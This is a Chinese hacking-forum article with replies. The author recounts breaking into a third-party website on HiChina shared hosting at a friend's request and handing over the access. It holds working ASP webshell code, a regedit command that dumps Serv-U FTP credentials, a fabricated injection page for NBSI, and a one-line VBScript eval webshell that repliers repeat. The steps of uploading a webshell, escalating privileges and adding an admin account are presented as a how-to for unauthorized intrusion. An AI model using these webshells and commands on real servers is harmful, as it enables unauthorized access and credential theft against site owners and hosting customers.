[原创]万网:我进来玩过两次了
文章作者:Andyower 天使娃娃信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注:本文已发表2005年9月的黑客防线.如有转载,请注名[/b]
近日,朋友说要我帮他弄一个站点,说那个站点有许多他想要的资料,他给出了站点www.***d.com,由于一些原因,所以本文有很多的截图都不能提供,希望大家可以谅解.
[b]第一次渗透[/b]
先从主站入手,登陆上去看看,主站上面几乎都是静态的,只有一些新闻,而那些新闻是的注入点是连接到另外的一个IP,220.194.*.*/news.asp?id=111,试一下提交and 1=1,and 1=2,还有"news.asp?id=1'11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11--1",全部返回正常,也就是说"'",";","--"," ",已经全部被过滤了,再去220.194.*.*去溜达一下,看见一个论坛,动网的,是前几天刚刚装上去的,注册人数不到50人,为了避免对方是骗人,把建站的日期修改,还是把最新的漏洞测试一下,都不能成功,想跨站?管理员就没有上过论坛.
这个时候,对www.***y.com扫描的报告出来了,开放21,80,3389,试着ftp上去看看.返回了信息如下:
C:\Documents and Settings\Andyower>ftp www.***d.com
Connected to [url]www.tnbfriend.com.[/url]
220-Microsoft FTP for WinSock ready...
220 (欢迎您使用中国万网虚拟主机服务,本空间禁止使用聊天室,江湖游戏,在线视频播
放,专业下载等严重耗用服务器资源的程序,谢谢您的合作!)
User ([url]www.tnbfriend.com:[/url](none)):
显示的是"Microsoft FTP for WinSock ready",小样的,"serv-u',你以为你换了马甲我就不认识你啊,原因是因为出现了"220",一般来说,返回的信息有"220"的,就多半都是"serv-u"了.是万网的虚拟主机,听说万网的虚拟机被人搞过很多次了,不知道现在有没有学乖点呢.先不管这个,既然是虚拟主机,就几乎可以肯定的,一定可以旁注.
打开Domain3.5,设置好参数,过了没多久出来结果,上面捆绑了非常多的网站,看得我都不想看了,纯粹属于体力活,还好有天使娃娃在,这种事情就交给她吧.让她随便找到一个存在漏洞的网站,得到个webshell再说.(天使娃娃:为什么受伤的总是我......)
不知道是因为天使娃娃的命好还是人品好,才不到10分钟,就拿下了一个年老失修的动网,并且把一句话木马写好了,就等着我去连接了.我比较喜欢海阳顶端木马,配合起一句话非常的好用。连接上去以后,看见了许多的站点.如图1:[img]http://bbs.pao7.com/pic/ww/1.JPG[/img]
随便点击一个进去看看,发现没有权限,也许是为每个用户都提供了一个帐号吧.再看看其他的东西,发现不能执行cmd,自己上传了一个cmd.exe上去,发现还是不能执行.因为现在我用的这个海洋不是最新的版本,所以没有查看组件的功能,在没有查看组件前,很多的东西都是不能确定的.这次,上传了另外一个海洋,查看组件.如图2:[img]http://bbs.pao7.com/pic/ww/2.JPG[/img]
最重要的2个组件可以用:Shell.Application ,WScript.Shell,也就是说WScript.Shell被改名了,但是还是存在的,这种小事难不到偶滴,马上弄了段代码上去,内容如下
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>
提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令.如图3[img]http://bbs.pao7.com/pic/ww/3.JPG[/img]
现在已经可以运行cmd命令了,在这里我想说一下,在组件探测的时候,探测到WScript.Shell不存在也有可能可以执行命令的.在这补充一下,写完这文章的时候,突然发现,其实海洋就直接提供有这个功能了,只是我一直没用到.只要在执行Wscript.Shell的页面,点击使用Wscript.Shell,然后在下面的命令框下写自己的cmd.exe的路径写上去,例:
"f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an",这个效果和我用的效果是一样的.(在此感谢Lcx大哥提供那么好用的马儿).
在netstat -an的时候.有一条值得注意'TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING",和想象中的一样,既然是这样子,把早就准备好了的serv-u本地提升权限的程序弄上去,试了几个都不能成功,难道说密码改了?前面我已经试过跳转目录,在"C:\Documents and Settings\All Users\「开始」菜单\程序\"找到了serv-u的目录,并且下载了快捷方式,得到路径以后,尝试跳到serv-u的目录,已经试过了,不能的跳转,做了限制.就这样的放弃了?不能,当然不能了,都做到这一步了,放弃了太可惜了.不知道大家记得不记得6月的黑防,下雨天[F.S.T]写的那篇文章:"serv_u FTP 再暴本地权限提升漏洞",也许很多人没有注意到吧,可能是因为觉得局限性非常的小,但是,我可以告诉你们,成功率高达80%,为什么呢?因为现在的虚拟主机商都怕了serv-u本地权限提升漏洞,所以,他们很都的管理员都是把密码存放在注册表里面,也就是说,符合了下雨天文章所说的要求,帐号和密码存放在注册表里面.不记得的读者们请重新的翻开书来看看吧.我也不想废话那么多,直接看怎么实现的吧,在webshell那,执行命令:regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" ,就会把注册表的中的serv-u的帐号密码全部的导出到了C:\Documents and Settings\All Users\Documents\system.ini这个文件里面,当然了前提是:C:\Documents and Settings\All Users\Documents\ 这个文件是可写的,如果不能写的话,自己换一个可以写的目录吧.然后下载system.ini文件,打开一看!呆了!如图4:[img]http://bbs.pao7.com/pic/ww/4.JPG[/img]
所有的人的帐号密码都是明文的,在这里想说一下,因为我们的权限是Guests的,所以是根本没有权限往注册表里面写入一个管理员的帐号和密码,而且为了证明自己的想法,偶也在本机测试过,在Guests下,是没有任何权限往注册表修改或者是添加删除的.很多的办法都试过了,还是不行.跳转到c:\winnt\下,非常多的KB*.log文件,这些都是补丁的日志,最新的一个补丁就是在昨天打的,也许是因为开启了windows自动更新的功能,我猜想管理员才不会那么的勤快.
现在我们已经有了所有用户的ftp帐号和密码,关键就是找到ftp帐号密码所对应的网站了,但是他的网站的目录都是按顺序的,从目录根本没有办法猜到哪个目录对应着哪个网站,400多个站点啊!一个个手工的测试的话,会让人疯掉的.我现在休息一下.体力活,让天使娃娃来吧.(天使娃娃:为什么受伤的又是我......)至于在得到所有ftp帐号和密码的情况下怎么知道哪个ftp对应的是哪个网站,我也说说吧,先找出目标网站的特殊一点的网页名字,然后一个个帐号密码的登陆,用ls命令来查看,是不是存在那个文件,如果不存在就下一个,如果存在,还要再仔细的查看其他的文件,是不是都符合要求,存在不存在那个站点的其他的文件.晕了吧,没事,实例说明一切.
先上www.***d.com网站,找几个特殊的文件,在这里,我找到的是[url]http://www.[/url]***d.com/sqrd.htm,还有[url]http://www.[/url]***d.com/yuq.htm.得到文件名,sqrd.htm还有yuq.htm,然后从cn23001这个帐号开始,用得到的帐号和密码登陆,登陆进去以后,发现没有sqrd.htm文件的就直接跳过去了,如果存在sqrd.htm文件,再看看有没有yuq.htm文件.如果都存在,说明很大可能就是这个ftp帐号了,对了,还忘记说了一下,在system.ini文件里面,重要的就是2样东西.第一个:[HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\\Domains\1\UserSettings\cn23017] ,帐号就是cn23017,第二:密码就是在下面的"Password"=这里是密码,一个个的慢慢试吧.我去睡觉了,累死了.
一觉醒来,天使娃娃很郁闷的对我说,还是没有找到,他都试到了cn23217了,已经累得不行了,上网查查有没有相关的软件,查不到,算了,还是我们伟大的领袖毛主席说得好,自己动手丰衣足食.自己写一个程序来针对性的暴力破解吧.花了点时间把程序写好,程序界面如下图5:[img]http://bbs.pao7.com/pic/ww/5.JPG[/img]
界面是难看了一点,因为赶时间嘛,写个程序花了半个多小时,再美化的话又要花几个小时了,简直是浪费时间.能用就可以啦.说名一下,"ftp主机名"不用说了吧.对方的ftp的地址,"特殊文件名"填写的是要得到的ftp对应的网站的特殊文件名,这个已经在文章中说名了的."从第几个ftp帐号开始...",这个地方,按照自己的要求来写,因为偶在测试的时候,有的时候读取到100多个,程序就挂了,如果重新开始又太麻烦,所以就加上这个选项,防止程序挂了以后,不用重新开始读取,默认写1就可以了,意思是从文件中的第一个ftp帐号开始测试,其他的就不用写啦,就等着帐号出来吧.还有一点,因为为了节约时间.我没有用到多线程,所以就自动跳出对话框来代替了多线程,防止程序死锁.等下次有时间或者是有人觉得好用,我再完善吧.现在就这样将就着先吧.下面是我的测试.如图6:[img]http://bbs.pao7.com/pic/ww/6.JPG[/img]
我是从第4个帐号开始读取,当登陆的ftp下存在index.asp这个文件的时候,就会把帐号和密码再列出来,方便吧.到了这里也许会有人问,万一有几个网站都存在着一样的特殊文件名呢?呵呵,这个时候,就需要自己动一下手啦,不能那么懒的.
不到几分钟,已经测试完了,其中的一个帐号存在着我写的特殊的文件名,就他了.手工ftp进去看看,完全就是这个站点了,小样的,www.***d.com,你以为你躲着深我就找不到你了啊!哈哈!一样让你跑不掉!ls命令看看.发现一个conn.asp文件,打开来看看,既然是另外一个主机的连接信息:
<%
dim conn
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=220.194.*.*;uid=j****;pwd=d******;database=d*****;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
[b]再次渗透[/b]
这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的,这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限,很多命令不能用,自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息,速度会快很多的.
偶马上就在本地架设了一个IIS,然后把他的conn.asp文件弄到我的虚拟目录下.再构造一个存在注入点的文件a.asp,里面的admin表是存在的,代码如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id '如果没有这个表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录,web目录在d:\wwww,还装了serv-u,这个服务器因为是自己的,所以不会那么专业吧,应该不会设什么防的.先得到webshell再说,db_owner的权限可以备份数据库,我用xiaolu的getwebshell.exe,备份数据库文件到d:\www\1.asa,结果不能运行!出错!原来该死的数据库中存在<% 这个东西,没办法,运气一向不是很好,这次又是个很好的理由.慢慢的找到数据库中看哪个字段存在<%的内容,删除!
又花了半个小时找出来了,用SQL语句把他删除,再备份,这次成功了.成功的拿到webshell,觉得不好看的,重新写一个webshell进去吧,接着就是serv-u提升权限,添加一个帐号,设置成为管理员,3389登陆进去,爽死了!什么都有了,把帐号密码给朋友吧,他爱怎么搞是他的事情了,我的任务已经完成.
[b]注意:由于本文图片为引用 为了避免图片失效 上传含图pdf附件提供大家下载 欢迎使用adobe 生成PDF文件可以较好的保护您的版权 您可以同步发出含图主题和PDF 不用担心别人转载文章删除您的附加信息 因为还有PDF可以说明一切[/b] 第二次渗透时的..思路很好.
引用作者
他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息
思路值得引见..这种方法在旁注的时候有些用..拿到同一服务器的webshell..如果只能读不可写..就可以读取conn.asp伪造注入点来达到爆出目标站的数据库信息 他不是有webshell么..
用webshell连mssql不比nbsi快?
晕.. [quote][b]下面是引用小齐于2005-09-29 13:18发表的:[/b]
他不是有webshell么..
用webshell连mssql不比nbsi快?
晕..[/quote]
呵呵~~
如果使用webshell连接~
还不如使用查询分析器快~
但是你要想想呀~db_owner权限~
你使用webshell连接有什么意义呢~
如果是这样~还不如查询分析器快~
但是查询分析器~还不够伪造注入点~快~ 其实还有个好处~
也就是~
不会在对方主机上留下任何痕迹 regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"
别的我都不想问,你这个是拿什么权限实现的?
读取这个的时候HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\ <% 这个东西
当然可以不用这个了,还要删数据库累死了.
换这个上去吧<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>
能利索很多.呵呵 [quote][b]下面是引用tsgxyy于2005-09-30 03:50发表的:[/b]
<% 这个东西
当然可以不用这个了,还要删数据库累死了.
换这个上去吧<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>
.......[/quote]
这位朋友的思路是提权了mssql差异备份的成功率吧?我是小菜``经常back不成功! [quote][b]下面是引用tsgxyy于2005-09-30 03:45发表的:[/b]
regedit /e "C:Documents and SettingsAll UsersDocumentssystem.ini" "HKEY_LOCAL_MACHINESOFTWAREcat softserv-u"
别的我都不想问,你这个是拿什么权限实现的?
读取这个的时候HKEY_LOCAL_MACHINESOFTWAREcat softserv-u[/quote]
你在本机架设一个serv-u的服务器,然后把帐号密码用写入注册表的方法储存,你就会明白了~
呵呵~
光看是没有用的~如果想怀疑~就请自己实验过以后再怀疑~~
guests组下默认是有很多键值可以读取
还有
默认C:\Documents and Settings\All UsersDocuments也是可以写的
文章是建立在这2个方面才成立 [quote][b]下面是引用tsgxyy于2005-09-30 03:50发表的:[/b]
<% 这个东西
当然可以不用这个了,还要删数据库累死了.
换这个上去吧<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>
.......[/quote]
因为数据库中存在<%
哪怕你再怎么换,也是没有用的,因为你在备份以后得到的文件,里面以后包含了不正确的<%,所以下一步,无论再怎么做,都不会正确.而且.<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>这一句话木马还比我原来的还麻烦.在什么情况下使用<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>呢~就是在对方过滤了%的时候才使用,问题是~对方都没有过滤~没有那个必要写那么麻烦的语句~呵呵:) [quote][b]下面是引用堕落青年于2005-09-30 07:38发表的:[/b]
这位朋友的思路是提权了mssql差异备份的成功率吧?我是小菜``经常back不成功![/quote]
你选择的数据库太大了
你要看看有没有其他小一点的数据库
还有,如果在数据库中有不正确的字符,或者没有备份数据库的权限,都不会成功的 呵呵,不错是不错,但后面的渗透好像不在你朋友交给你的任何之中了!哈哈
既然webshell拿到,数据库用户和密码也拿到了,这网站好像就没有什么其它
东西可以拿了吧!不过后面渗透的思路的确很好,呵呵~ [quote][b]下面是引用andyower于2005-09-29 14:55发表的:[/b]
呵呵~~
如果使用webshell连接~
还不如使用查询分析器快~
.......[/quote]
我也这么想,楼主的文章从头到尾没看到任何好看的部分。这些技术网上都说烂了,而且关键是思路太平淡了!!!! 我今天入侵了一个虚拟主机```用wsh执行命令,regedit /e "e:\www\aa\mima.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"
"e:\www\aa\mima.ini"是iis的目录,运行webshell里没反应(海洋06wsh可以看net user,和netstat -an)
请问运行那个命令要什么权限/?guest?user?还是怎么的? 文章思路确实很好!很多地方值得我们菜鸟学习!
第一次渗透:
1.WScript.Shell改名后的利用方法(以前好像有个cmd.asp,忘了谁写的了,可以在WScript.Shell改名后使用)
2.就是那个HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\,这个我是看了本文后才知道的,原来ser-u还能这样保存用户名密码, 想问的就是,是不是serv-u保存在注册表中的密码都是名文么?
3.就是想学正真的技术编程必不可少![s:45]
第二次渗透:
1.构造注入!这个思路以前我也想到过,可就是自己不是很懂写ASP,所以也从来没有测试过! 想问的就是数据库中
db_owner权限具体能干什么?
2.对getwebshell.exe,备份webshell出错的解决办法. 这个我遇到过,我备份的webshell连接后提示什么缺少"
<%"这个符号,具体忘了,反正就是错误提示里有"<%",请问是不是作者说的数据库中存在<%的原因? 还有数据库中存在<%是不是管理员故意设置为了防止数据库被下载? 感觉那个手动找数据库中<%符号的办法太累了,有没有
什么更好的办法?
这些都是我自己的观点,说错了请不要见笑! 思路到是很好!不过我感觉这有点太巧了吧!
"mssql差异备份"
你是用什么权限? [quote][b]下面是引用andyower于2005-09-29 14:55发表的:[/b]
呵呵~~
如果使用webshell连接~
还不如使用查询分析器快~
但是你要想想呀~db_owner权限~
你使用webshell连接有什么意义呢~
如果是这样~还不如查询分析器快~
但是查询分析器~还不够伪造注入点~快~
.......[/quote]
错错,完全错,错的离奇!!作者连基本的入侵概念都不懂!注入和使用webshell所使用的连接sql的权限是一样的(怎么可能用注入方式就比webshell的sql查询大),当然用webshell的sql查询功能方便很多很多啦。而且这篇文章问题不少,思路还是很差的。这也是没一位高手来赞扬这篇文章的原因!!!希望作者多学些基本的电脑知识再来编故事。水平太差了! 还有,导出system.ini那部分,servu密码应该是md5加密的,怎么会是明文的。作者可以重现密码明文保存的环节吗? [quote][b]下面是引用wedxzaw于2005-10-03 22:17发表的:[/b]
还有,导出system.ini那部分,servu密码应该是md5加密的,怎么会是明文的。作者可以重现密码明文保存的环节吗?[/quote]
晕了,到底谁对谁错啊? [quote]错错,完全错,错的离奇!!作者连基本的入侵概念都不懂!注入和使用webshell所使用的连接sql的权限是一样的(怎么可能用注入方式就比webshell的sql查询大),当然用webshell的sql查询功能方便很多很多啦。而且这篇文章问题不少,思路还是很差的。这也是没一位高手来赞扬这篇文章的原因!!!希望作者多学些基本的电脑知识再来编故事。水平太差了![/quote]
这位一定就是传说中的高手了~作者的意思: Webshell和sql查询分析器都是db_owner权限~如果是SA权限的话,也许你用webshell会很方便,但是db_owner权限,你想用webshell来干什么?所以作者选择了用NBSI,他在这里是回答论坛里的朋友提出的问题,拜托你看清楚在指责,而且我觉得你根本就没理解楼主在说什么.
[quote]还有,导出system.ini那部分,servu密码应该是md5加密的,怎么会是明文的。作者可以重现密码明文保存的环节吗?
[/quote]
作者的话:
[quote]不知道大家记得不记得6月的黑防,下雨天[F.S.T]写的那篇文章:"serv_u FTP 再暴本地权限提升漏洞",也许很多人没有注意到吧,可能是因为觉得局限性非常的小,但是,我可以告诉你们,成功率高达80%,为什么呢?因为现在的虚拟主机商都怕了serv-u本地权限提升漏洞,所以,他们很都的管理员都是把密码存放在注册表里面,也就是说,符合了下雨天文章所说的要求,帐号和密码存放在注册表里面.不记得的读者们请重新的翻开书来看看吧.[/quote]
还是同样请wedxzaw同志看清楚作者的文章再发表意见.
server-u保存帐号密码的方式有两种,一种是存放在ServUDaemon.ini,另一种是存放在注册表中.存放在ServUDaemon.ini的密码是经过加密的,而注册表中的则是明文存放的.
所以,OK? 不一定
至少我碰到6.0是采用加密方式储存在注册表中的 [quote][b]下面是引用小鱼修炼中于2005-10-03 20:39发表的:[/b]
文章思路确实很好!很多地方值得我们菜鸟学习!
第一次渗透:
1.WScript.Shell改名后的利用方法(以前好像有个cmd.asp,忘了谁写的了,可以在WScript.Shell改名后使用)
2.就是那个HKEY_LOCAL_MACHINESOFTWAREcat softserv-u,这个我是看了本文后才知道的,原来ser-u还能这样保存用户名密码, 想问的就是,是不是serv-u保存在注册表中的密码都是名文么?
3.就是想学正真的技术编程必不可少![s:45]
.......[/quote]
回答第二个问题:这个是下雨天发现的,我是看了他的文章我才知道的~密码是明文保存的。至少我遇到的都是~
最后一个问题,我没有很好的办法来去掉<%~呵呵~ 不过,你可以选择换数据库~ [quote][b]下面是引用wedxzaw于2005-10-03 21:33发表的:[/b]
错错,完全错,错的离奇!!作者连基本的入侵概念都不懂!注入和使用webshell所使用的连接sql的权限是一样的(怎么可能用注入方式就比webshell的sql查询大),当然用webshell的sql查询功能方便很多很多啦。而且这篇文章问题不少,思路还是很差的。这也是没一位高手来赞扬这篇文章的原因!!!希望作者多学些基本的电脑知识再来编故事。水平太差了![/quote]
不好意思哦~我从来没有说过我是高手~我不在乎别人来不来赞扬我~难道说~你写东西~或者说学东西就是为了别人赞扬吗?~没有人赞扬你~你就不学了吗?如果是这样~我可以做好人~以后你无论写什么东东,我就会在后面说~好啊好啊好啊好啊~~棒啊棒啊棒啊~这样总可以了吧~在你心中什么才算是高手呢?
最重要的一点~请看出了~ 我说的是快!不是大~大和快长得很像吗?不觉得哦~根本不是一个概念的东西。我都不知道你怎么把他混在一起了~
还有~我没有编过故事~如果是编故事~我何必呢~何必还要写一个程序来衬托我的文章是真实的呢?不相信的话,我也没办法嘛~何必说出来呀~说得我也不好意思了~呵呵~如果你觉得有问题~你就把问题全部说出来。如果真的是我错,那么,我真心像你请教:) [quote][b]下面是引用wedxzaw于2005-10-03 22:17发表的:[/b]
还有,导出system.ini那部分,servu密码应该是md5加密的,怎么会是明文的。作者可以重现密码明文保存的环节吗?[/quote]
哈哈~你都说了:servu密码应该是md5加密的
只是应该~不是真的~密码就在文件里面,而且有截图,自己去看吧,虽然我模糊化了,但是也可以很清楚的看见,密码没有经过任何的加密 [quote][b]下面是引用十二少于2005-10-03 23:43发表的:[/b]
不一定
至少我碰到6.0是采用加密方式储存在注册表中的[/quote]
十二少说的对~不一定的~但是我比十二少运气好点~呵呵~我遇到的是没有加密的:—) [quote][b]下面是引用yaqilles于2005-10-03 21:05发表的:[/b]
思路到是很好!不过我感觉这有点太巧了吧!
"mssql差异备份"
你是用什么权限?[/quote]
这叫做无巧不成书嘛
文章里面已经说了啦
db_owner权限的呢~ [quote][b]下面是引用堕落青年于2005-09-30 20:33发表的:[/b]
我今天入侵了一个虚拟主机```用wsh执行命令,regedit /e "e:wwwaamima.ini" "HKEY_LOCAL_MACHINESOFTWAREcat softserv-u"
"e:wwwaamima.ini"是iis的目录,运行webshell里没反应(海洋06wsh可以看net user,和netstat -an)
请问运行那个命令要什么权限/?guest?user?还是怎么的?[/quote]
这也是运气的成分
如果管理员把密码放到注册表里面,才能成功 最后补充
好象我没有得罪过什么人吧。。
为什么要这样来针对我呢?我只是在自己的成长过程中,发现了一些好的东西,写出来和大家一起分享一下,为了让其他人在入侵的时候更加多的一条路选择而已。其他的我不想说什么,文章如果是骗人的。我为什么要写呢?而且还要发在EST,EST,是一个我梦寐想加入的地方,我不会在这片净土上染上灰尘?
刚刚仔细想了一下,我的语气重了很多。在这里向wedxzaw道歉了。。 回snowdown:
webshell是db_owner权限,那注入也是db_owner,当然是webshell方便。其实从你这点来看,作者和你一样都只会用工具,而自己却不懂sql查询语句。文章中
第二点更是说明snowdown可笑的离普。谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码,不信任何人都可以下个servu-5.0/servu-6.x进行测试,snowdown你骗人毕竟不是正道,自己下个servu自己测试测试吧,可能你连servu都没用过! 请问哪里可以找到下雨天的 那篇文章:serv_u FTP 再暴本地权限提升漏洞",
谢谢! To wedxzaw:
[quote]webshell是db_owner权限,那注入也是db_owner,当然是webshell方便。其实从你这点来看,作者和你一样都只会用工具,而自己却不懂sql查询语句。[/quote]
这句话什么意思?怎么会有这种观点呢?难道会用ASP木马或者PHP等CGI的木马就是会SQL语句了?是啊,我苯呀~不知道select,update,delete,insert,union,盼望大师您来教教我啊!
[quote]第二点更是说明snowdown可笑的离普。谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码,不信任何人都可以下个servu-5.0/servu-6.x进行测试,snowdown你骗人毕竟不是正道,自己下个servu自己测试测试吧,可能你连servu都没用过![/quote]
可笑或者不可笑,骗人与不骗人其实和我无关吧!大哥!拜托你翻翻书好嘛~不要总是上来用这么过激的言论.
你去翻翻黑防第6期的下雨天[F.S.T]的那篇<<serv_u FTP 再暴本地权限提升漏洞>>文章,如果你说黑防和我一样白痴,和我一样骗人,那我就忍了~
PS:最后,想说一句话,技术讨论的地方不是狂吠不止的地方,人要有理性的说话,而不是像某种生物一样,THX. 忘了一点,刚才十二少说他碰到的是在注册表里存放加密的密码,我还是真的和作者一样幸运呢~
莫非这就传说中的人品问题?
所以要是说错了,请大家多多包涵~
(俺真的是见的全是明文存放在注册表里哦~没有骗人哟~) 有关第一点,你说你不会一点sql,就说明你的知识太少了,难怪这点都看不出.第二点,我只是提出我置疑的观点(也是很多人的观点).回答别人的问题不是用语言来击打对方,而是摆出有事实根据的说法,而不是讲人品问题。从这点也说明snowdown自身人品如何了,这也是很多人背后说snowdown的原因 [quote]有关第一点,你说你不会一点sql,就说明你的知识太少了,难怪这点都看不出.第二点,我只是提出我置疑的观点(也是很多人的观点).回答别人的问题不是用语言来击打对方,而是摆出有事实根据的说法,而不是讲人品问题。从这点也说明snowdown自身人品如何了,这也是很多人背后说snowdown的原因
[/quote]
是啊,是啊~还是您老厉害~我决定不和您在这里吠下去了~
莫非真的扯到我人品问题了?哎,闪人,闪人~ 文章我也看了。也是不大明白andyower入侵的原理,ServU我还真没怎么用过,
看来应该测试下!对于创造一个SQL注入,我也觉得不如webshell直连方便!
路过,路过。。。 我拿过一个su`他的配置文件里`密码明文的! 我也遇到过download.it.com.cn原来就是的。
进去加了一个管理员帐号~
呵呵~~it.com.cn的好多管理密码就是部门拼音反过来写! NO need to argue such a question like this, you can [b]think about[/b] it and try to do like this
1)install serv-u 6 or another version and [b]confige[/b] it [b]to store password[/b] in the registry
2)make a server such as IIS in your own computer and try to follow the [b]auther[/b] to hack it
3)you will got it, what the answer is!
by the way, [b]understand SQL or not is not the problem to understand this article[/b],[b]toos is just a tools[/b], it is simple and simple for user to use. there may be [b]not one way to do something[/b]. if you want to know the answer, try it! [s:51]
[b]--Administrators--
黑体部分为:单词拼写错误 语法错误 词法错误和不正规用法...中国人和中国人交谈时不妨用中文[/b] >>谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码
老兄只是使用了默认设置而已.
SERVU可以使用多种配置方法.其中包括对密码明文不进行加密
很多主机管理系统由于不知道SERVU的密码加密方法(SALT+MD5)
所以干脆用明文保存密码方便主机管理系统来增添和修改FTP帐户. [quote][b]下面是引用wedxzaw于2005-10-03 22:17发表的:[/b]
还有,导出system.ini那部分,servu密码应该是md5加密的,怎么会是明文的。作者可以重现密码明文保存的环节吗?[/quote]
我也见过serv-u的密码是明文保存在ini文件中的.... 不对。
<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>
这句代码的成功率我在进的时候几乎都可以传上去。我没有必要说假话啊。你不信试试。在所有<% aspshell都不可以通过的时候传这个是最有效的。 汗 我也进了一次万网。。
您查询的IP:210.192.122.120
查询结果1:北京市 万网公司IDC
查询结果2:北京市
旁注 通过DVBBS搞得 请问我上传了cmd.exe到网站目录,我执行netstat -an的时候,Wscript.Shell拒绝访问,有什么办法解决吗?
小弟ASP还没入门.. 对于楼主
最重要的2个组件可以用:Shell.Application ,WScript.Shell,也就是说WScript.Shell被改名了,但是还是存在的,这种小事难不到偶滴,马上弄了段代码上去,内容如下
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>
提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令.如图
这里有疑问...我碰到跟你一样的情况....就是失败..............什么原因?还请指点。........ Andyower
我支持你,问你问题的有些人真是看不惯,自己是个菜,还说别人是菜。
不想提了,路过。 对了,提一点,Andyower你说的是思路,非常不错,玩入侵就不要照般东西,要灵活运用。
至少我玩万网是成功的~反正也进去几次了。 呵呵,ps某人,说人的时侯动动脑!
注入手件到另一台服务器里!我跟你打赌,你用手工的就没有我快!
虽然工具是别人的!但是你入侵的时侯我想请问一下你是不是每次都手工!
不说什么,就说注入,16位md5的密码现在很多网都在用,你去手工
功呀,那样我不知道你入侵一个站需要多长的时间!你要懂得人是活
的,入侵靠的是什么,不就是思路吗?说难听一点,就算你技术高,
你没经验,没思路,你能做什么~
再说白一点,你所懂的技术又是谁教你的呢,还不是人
家的技术,有本事就自已研究点技术出来!我晕死! 〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
andyower
的思路总的来说是不错的。,差异备份用这个马:
<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>成功率是要高些,但是在这里可能也不行,因为数据库本来就有<%,备份了也会出错,
所以<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>也好不到哪里去。
前面某些人的评论带有攻击性和打击性,实在不爽,
讨论技术不应该这样。千万不要总是认为别人不行,自己牛X,说不定自己真正动手的时候还不如andyower
弟弟。
[s:46] [s:46] [s:46]
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓 [quote]<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>
提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令[/quote]
好东西,终于又学了一招。
看看浏览器标题,晕了,老大没注意么,站点URL显示得好清楚。
下载的PDF文件字体蛮淡,眼睛⒏好,看不蛮清楚,还是认真看完了。
对了,fhod大哥不是在黑基干么到这里来逛拉,又要忙着办自己的站,还要忙着入侵,还要学习,
